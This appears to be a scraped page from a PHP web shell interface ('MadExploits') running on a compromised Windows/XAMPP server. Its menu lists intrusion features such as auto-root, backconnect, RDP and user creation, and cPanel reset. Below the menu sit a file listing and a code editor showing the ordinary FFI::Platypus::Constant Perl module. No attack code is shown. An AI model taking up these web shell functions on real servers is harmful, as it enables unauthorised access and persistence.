Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
perl /
vendor /
lib /
FFI /
Platypus /
[ HOME SHELL ]
Name
Size
Permission
Action
Lang
[ DIR ]
drwxrwxrwx
Record
[ DIR ]
drwxrwxrwx
Type
[ DIR ]
drwxrwxrwx
TypeParser
[ DIR ]
drwxrwxrwx
API.pm
5.69
KB
-rw-rw-rw-
Buffer.pm
9.62
KB
-rw-rw-rw-
Bundle.pm
15.63
KB
-rw-rw-rw-
Closure.pm
3.39
KB
-rw-rw-rw-
Constant.pm
4.57
KB
-rw-rw-rw-
DL.pm
5.47
KB
-rw-rw-rw-
Declare.pm
10.8
KB
-rw-rw-rw-
Function.pm
3.76
KB
-rw-rw-rw-
Internal.pm
1.29
KB
-rw-rw-rw-
Lang.pm
1.44
KB
-rw-rw-rw-
Legacy.pm
2.17
KB
-rw-rw-rw-
Memory.pm
4.9
KB
-rw-rw-rw-
Record.pm
11.33
KB
-rw-rw-rw-
ShareConfig.pm
1.79
KB
-rw-rw-rw-
Type.pm
40.64
KB
-rw-rw-rw-
TypeParser.pm
3.02
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Constant.pm
package FFI::Platypus::Constant; use strict; use warnings; use constant 1.32 (); use FFI::Platypus; # ABSTRACT: Define constants in C space for Perl our $VERSION = '1.31'; # VERSION { my $ffi = FFI::Platypus->new( api => 1 ); $ffi->bundle; $ffi->type( 'opaque' => 'ffi_platypus_constant_t' ); $ffi->type( '(string,string)->void' => 'set_str_t' ); $ffi->type( '(string,sint64)->void' => 'set_sint_t' ); $ffi->type( '(string,uint64)->void' => 'set_uint_t' ); $ffi->type( '(string,double)->void' => 'set_double_t' ); $ffi->mangler(sub { my($name) = @_; $name =~ s/^/ffi_platypus_constant__/; $name; }); $ffi->attach( new => [ 'set_str_t', 'set_sint_t', 'set_uint_t', 'set_double_t' ] => 'ffi_platypus_constant_t' => sub { my($xsub, $class, $default_package) = @_; my $f = $ffi->closure(sub { my($name, $value) = @_; if($name !~ /::/) { $name = join('::', $default_package, $name); } constant->import($name, $value); }); bless { ptr => $xsub->($f, $f, $f, $f), f => $f, }, $class; }); $ffi->attach( DESTROY => ['ffi_platypus_constant_t'] => 'void' => sub { my($xsub, $self) = @_; $xsub->($self->ptr); }); sub ptr { shift->{ptr} } } 1; __END__ =pod =encoding UTF-8 =head1 NAME FFI::Platypus::Constant - Define constants in C space for Perl =head1 VERSION version 1.31 =head1 SYNOPSIS C<ffi/foo.c>: #include <ffi_platypus_bundle.h> void ffi_pl_bundle_constant(const char *package, ffi_platypus_constant_t *c) { c->set_str("FOO", "BAR"); /* sets $package::FOO to "BAR" */ c->set_str("ABC::DEF", "GHI"); /* sets ABC::DEF to GHI */ } C<lib/Foo.pm>: package Foo; use strict; use warnings; use FFI::Platypus; use base qw( Exporter ); my $ffi = FFI::Platypus->new; # sets constatns Foo::FOO and ABC::DEF from C $ffi->bundle; 1; =head1 DESCRIPTION The Platypus bundle interface (see L<FFI::Platypus::Bundle>) has an entry point C<ffi_pl_bundle_constant> that lets you define constants in Perl space from C. void ffi_pl_bundle_constant(const char *package, ffi_platypus_constant_t *c); The first argument C<package> is the name of the Perl package. The second argument C<c> is a struct with function pointers that lets you define constants of different types. The first argument for each function is the name of the constant and the second is the value. If C<::> is included in the constant name then it will be defined in that package space. If it isn't then the constant will be defined in whichever package called C<bundle>. =over 4 =item set_str c->set_str(name, value); Sets a string constant. =item set_sint c->set_sint(name, value); Sets a 64-bit signed integer constant. =item set_uint c->set_uint(name, value); Sets a 64-bit unsigned integer constant. =item set_double c->set_double(name, value); Sets a double precision floating point constant. =back =head2 Example Suppose you have a header file C<myheader.h>: #ifndef MYHEADER_H #define MYHEADER_H #define MYVERSION_STRING "1.2.3" #define MYVERSION_MAJOR 1 #define MYVERSION_MINOR 2 #define MYVERSION_PATCH 3 enum { MYBAD = -1, MYOK = 1 }; #define MYPI 3.14 #endif You can define these constants from C: #include <ffi_platypus_bundle.h> #include "myheader.h" void ffi_pl_bundle_constant(const char *package, ffi_platypus_constant_t *c) { c->set_str("MYVERSION_STRING", MYVERSION_STRING); c->set_uint("MYVERSION_MAJOR", MYVERSION_MAJOR); c->set_uint("MYVERSION_MINOR", MYVERSION_MINOR); c->set_uint("MYVERSION_PATCH", MYVERSION_PATCH); c->set_sint("MYBAD", MYBAD); c->set_sint("MYOK", MYOK); c->set_double("MYPI", MYPI); } Your Perl code doesn't have to do anything when calling bundle: package Const; use strict; use warnings; use FFI::Platypus; { my $ffi = FFI::Platypus->new( api => 1 ); $ffi->bundle; } 1; =head1 AUTHOR Author: Graham Ollis E<lt>plicease@cpan.orgE<gt> Contributors: Bakkiaraj Murugesan (bakkiaraj) Dylan Cali (calid) pipcet Zaki Mughal (zmughal) Fitz Elliott (felliott) Vickenty Fesunov (vyf) Gregor Herrmann (gregoa) Shlomi Fish (shlomif) Damyan Ivanov Ilya Pavlov (Ilya33) Petr Pisar (ppisar) Mohammad S Anwar (MANWAR) Håkon Hægland (hakonhagland, HAKONH) Meredith (merrilymeredith, MHOWARD) Diab Jerius (DJERIUS) =head1 COPYRIGHT AND LICENSE This software is copyright (c) 2015,2016,2017,2018,2019,2020 by Graham Ollis. This is free software; you can redistribute it and/or modify it under the same terms as the Perl 5 programming language system itself. =cut
Close